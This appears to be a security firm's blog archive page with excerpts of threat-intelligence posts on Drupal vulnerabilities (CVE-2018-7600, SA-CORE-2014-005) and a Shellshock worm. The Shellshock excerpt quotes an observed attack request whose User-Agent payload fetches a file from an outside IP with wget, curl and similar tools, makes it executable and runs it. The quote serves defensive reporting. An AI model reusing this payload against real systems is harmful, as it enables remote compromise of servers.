On March 28, 2018, a patch for a highly critical vulnerability, which facilitates remote code execution against the Drupal content management system was released. The vulnerability was identified by Jasper Mattson of Druid and is covered by SA-2018-002 and CVE-2018-7600. Prior to the release of the patch, Drupal had given advanced notice of its impending release and potential consequences tied to the ease of the vulnerability’s exploitation. This sparked concerns of a new “Drupalgeddon”, where a large number of unpatched websites would be compromised. This comes on the heels of a major Drupal vulnerability from October 2014 that was widely exploited by advanced persistent threat (APT) actors and criminals that Volexity detailed in a previous blog post title Drupal Vulnerability: Mass Scans & Targeted Exploitation. In a post dated April 13, 2018, the Drupal team stated the following: The security team is now aware of automated attacks attempting to compromise Drupal […]
Scanning
-
Drupalgeddon 2: Profiting from Mass Exploitation
April 16, 2018
by Matthew Meltzer, Steven Adair
-
A New Shellshock Worm on the Loose
April 9, 2015
by Volexity
In a blog post from September last year, we described some of the early Shellshock activity we were seeing in the wild. Since then we have continued to observe periodic scanning, which have by in large not been particularly noteworthy. That remained the case until just a little bit ago. Starting late in the afternoon on April 8, 2015, the frequency and breadth of scanning observed by Volexity increased fairly dramatically. A closer look at the activity reveals that a worm (of sorts) has been set loose on the Internet looking for vulnerable hosts to exploit over HTTP. The inbound requests that have been observed look like this: GET HTTP/1.1 HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plain\r\n\r\nXSUCCESS!”;system(“cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh […]
-
Drupal Vulnerability: Mass Scans & Targeted Exploitation
October 16, 2014
by Volexity
Yesterday (October 15, 2014), a critical SQL injection vulnerability in version 7 of the popular open source content management system (CMS) Drupal was disclosed by Stefan Horst and detailed in SA-CORE-2014-005. The description of the vulnerability is rather harrowing: Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks. A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks. This vulnerability can be exploited by anonymous users. If you think this sounds pretty bad, you are spot on. Along with the advisory, a patch was released to fix the security issue. Unfortunately, patches are also often leveraged to identify exactly how to exploit such vulnerabilities. In this case, it was only […]